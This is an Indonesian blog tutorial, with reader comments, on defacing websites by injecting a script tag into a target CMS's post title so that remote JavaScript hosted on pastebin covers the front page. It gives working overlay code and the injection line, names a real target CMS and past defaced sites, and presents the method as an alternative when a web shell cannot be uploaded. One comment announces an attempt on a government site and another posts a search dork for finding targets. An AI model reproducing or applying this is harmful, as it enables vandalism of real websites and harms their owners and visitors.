Tutorial Deface – Menutup Halaman Depan Situs Target dengan JS Overlay – Kali ini saya akan share teknik deface yang “jarang” digunakan karena ini mungkin menjadi alternatif terakhir jika kita gagal memasang shell pada web target. Ada kalanya sebuah web tidak support file php [kalo ini masih bisa di tamper], atau Web tersebut tidak menyediakan fasilitas upload. Cara yang bisa kita pakai adalah menutup halaman depan dengan sebuah “evil” javascript. Teknik ini pernah digunakan saat situs 1CAK, Babymetal, dan IPB di deface.
Sistem kerjanya berbeda dengan teknik deface yang didahului dengan mengupload shell. Jika shell diupload, maka biasanya script asli yang diganti. Namun untuk JS Overlay, halaman asli web tersebut “ditimpa” oleh halaman deface yang kita buat. Jadi halaman asli tersebut tetap ada namun ditutup oleh script deface kita. Caranya ?
Sebelumnya kalian membutuhkan script deface yang sudah tertanam di web lain. Jika sebelumnya belum pernah melakukan deface, kalian bisa mengupload di hosting kalian. Ini hanya untuk “umpan” agar tampilan deface kita tampil di web target.
Selain source script deface, kalian juga membutuhkan evil script yang tertanam di web lain. Bisa diupload juga di pastebin. Untuk contoh scriptnya bisa kalian download disini: Script JS Overlay
Silahkan modifikasi sendiri bagian “Hacked by” dan source deface nya. Untuk halaman defacement nya, disini saya menggunakan script HTML yang sudah termirror di zone-h.org . Edit bagian :
- http://zonehmirrors.org/defaced/2016/10/22/msdental.com.br/msdental.com.br/k.php
Sebagai contoh, target kita kali ini adalah Lokomedia. Seharusnya bisa upload shell. namun sudah saya coba berkali-kali tidak bisa. Mungkin sudah diantisipasi oleh Webmasternya. Makanya saya coba menggunakan metode JS Overlay.
Oke, kita mulai tutorialnya :
Login ke web target. Buat post baru/kalian bisa mengedit judul/nama dari web tersebut. Masukkan script ini di bagian judul :
<script type="text/javascript" src="https://pastebin.com/raw/raJBgjmU"></script>
Untuk tulisan berwarna merah silahkan diganti dengan url kalian sendiri. Intinya kita memanggil script dari url tersebut untuk menutupi halaman yang akan kita deface.
Setelah di save, kita coba buka situs yang telah di tanam script js overlay tadi.
Teknik ini bisa digunakan di semua CMS. Entah itu Lokomedia, Joomla, WP, dll. Kekurangannya, kita tidak punya akses ke server karena tidak ada backdoor yang tertanam.Thanks to BagsFreakz from Surabaya Blackhat .
Script JS Overlay Simple
Nah yang kedua ini adalah script simple yang saya buat sendiri. Fungsinya sama seperti script sebelumnya, hanya saja yang ini lebih simple karena hanya memanfaatkan elemen innerHTML saja. Berikut contoh scriptnya
document.title="Hacked by LinuxSec"; document.body.style.backgroundColor = "#000000"; document.body.innerHTML = "<html><body style='background-color: black'><center><h1><b style='color: white'>Hacked by LinuxSec<p style='color: transparent'><title>Hacked by Nabilaholic404</title></html>";
Sama seperti sebelumnya, edit pada bagian yang ingin diedit, lalu upload ke pastebin. Untuk menggunakannya cukup panggil dengan kode html biasa. Contoh:
<script type="text/javascript" src="https://pastebin.com/raw/e54wNKNs"></script>
Output:
Done. Mudah bukan? Sekian tutorial kali ini, gunakan dengan bijak.
cik awi says
Wah bisa Jadi master hack bener lama lama loh sob. Tapi saya gak berani coba ntar takut kualat
chiaki says
Belajar kok kualat ? :p
Rohis Facebook says
nyimak sambil belum mandi heheh….
chiaki says
Waduh, stengah7 lho.
Masnady says
saya setuju sama komentar di atas @cik awi, hehehe lama lama sobat bisa jadi master hack nih. wah okelah. saya bisa belajar banyak nih ntr sama sobat. hehehehe
chiaki says
Saya cuma pemula. . . Hehehe
Muro'i El-Barezy says
mampir pagi hari sob, selamat beraktifitas dan happy blogging
chiaki says
Oke. Thx
Abed Saragih says
Semakin hari semakin keren aja tutorial yang diberikan sobat satu ini haha 🙂
chiaki says
Basic doang. . .
Etika Maria says
Belum ngerti, hehehehe…
macem jaringan aja aku ini.. LALOAD hehehe 🙂
chiaki says
hahahaha
Bung Penho says
pelajaran pertempuran dunia maya di blog ini makin hot aja hehehe..!
chiaki says
bisa aja sob.. hehehehehe
Deby Putra Bahrodin says
heker heker, awas minggir2 … Hohohoho..
Lanjutkan mas brooo….
chiaki says
wah,, saya cuma lamer kok… :v
cak oni says
waawar ala dunia maya nih
chiaki says
ini cuma sebagai pembelajaran doang .. hehehehehe
Riev - Bapo says
bisa belajar menjadi hacker nih
hehe
chiaki says
:v
Djangkaru Bumi says
Saya belum berani menanggung resiko, cuma numpang nyimak saja dulu.
chiaki says
Oke . :v
Forbidden 007 says
ijin nyoba gan 😀 web pemerintah :v
nono says
kalau tutorial yang pakai backtrack ada mas ???
chiaki says
ini kan eksekusinya di web korban. sama aja lah kek windows. -_-
Anonim says
mas, tolong lagunya diilangin biar enak bacanya
Anonim says
login dulu?
login pake apa :v
Anonim says
apaan orang di joomla gk bisa azzz nipu
muhammad riki potay says
inurl:il/index.php/[?????]
gial says
Err0r SquaD
Vbhh says
Indra says
mntp ni blognya
sas says
As7 says
Haii kak untuk menjadi planet Neptunus yang telah berpartisipasi dalam kayu yang telah berpartisipasi
tes says